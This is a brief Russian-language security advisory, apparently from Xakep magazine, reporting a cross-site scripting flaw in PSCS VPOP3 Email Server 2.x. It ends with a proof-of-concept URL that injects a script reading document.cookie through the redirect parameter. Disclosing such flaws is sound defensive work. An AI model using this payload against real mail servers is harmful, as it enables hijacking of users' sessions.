Рекомендуем почитать:


Хакер #315. Positive Hack Days Fest 3
Программа: PSCS VPOP3 Email Server 2.x
Уязвимость обнаружена в VPOP3. Злонамеренный пользователь может выполнить XSS нападение.
Пример/Эксплоит:
http://192.168.1.212:5108/index.html? redirect=admin/index.html";%0D
alert(document.cookie);%0D//